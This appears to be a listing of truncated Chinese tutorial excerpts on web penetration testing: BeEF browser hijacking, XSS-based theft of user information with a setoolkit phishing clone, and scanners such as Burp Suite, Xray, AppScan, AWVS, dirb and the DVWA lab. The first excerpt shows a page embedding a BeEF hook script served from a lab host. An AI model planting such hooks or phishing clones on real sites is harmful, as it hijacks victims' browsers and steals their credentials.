1.1 使用beef劫持用户浏览器 1.1.1 新建hook并启动apache [cce lang='bash']# vim /var/www/html/beef-xss.html <html> <head> <script src='http://192.168.10.180:3000/hook.j...

1.1 持久性XSS窃取用户信息 1.1.1 制作钓鱼网站 使用setoolkit克隆站点，setoolkit是一个万能的社工工具(社会工程学工具集合) [cce lang='bash']# setoolkit Do you agree to the terms of serv...

1.1 BApp添加插件 1.2 添加java插件 1.3 添加python插件 1.3.1 下载jython https://www.jython.org/download 1.3.2 配置burpsuite的jython环境 1.3.3 添加python插件

1.1 Burpsuite开启被动扫描 1.1.1 浏览器开启代理 1.1.2 burpsuite关闭拦截 1.1.3 配置被动扫描 1.1.4 访问要测试的站点 1.2 Burpsuite搭配Xray进行被动扫描 1.2.1 Xray配置侦听模式 [cce lang=...

1.1 AppScan简介 IBM Security AppScan （曾用名IBM Rational AppScan）是IBM的Rational软件部门的一组网络安全测试和监控工具。AppScan旨在在开发过程中对Web应用程序的安全漏洞进行测试。该产...

1.1 使用AppScan 1.1.1 程序修改为中文 1.1.2 扫描Web程序 1.1.2.1  未登录方式扫描站点 扫描靶场站点：http://192.168.10.159/sqli-labs/ 我们是对整个站点进行扫描，sqli-labs 案例中有些页...

1.1 AWVS简介 Acunetix Web Vulnerability Scanner（简称AWVS）是一款知名的自动化网络漏洞扫描工具，它通过网络爬虫测试你的网站安全，检测流行安全漏洞。它可以扫描任何可通过Web浏览器访问的...

1.1 Xray简介 1.1.1 Xray介绍 Xray是一款功能强大的安全评估工具，由多名经验丰富的一线安全从业者呕心打造而成，主要特性有： 检测速度快：发包速度快，漏洞检测算法高效； 支持范围广：大至OW...

1.1 dirb简介 基于字典的Web目录扫描工具DIRB，专门扫描/猜测Web站点下有哪些目录，发现潜在的渗透目标。 1.2 dirb使用 [cce lang='bash']$ dirb http://192.168.10.159 -o sqli-labs.dirb ----...

1.1 DVWA靶机搭建 DVWA (Damn VuInerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用，旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好...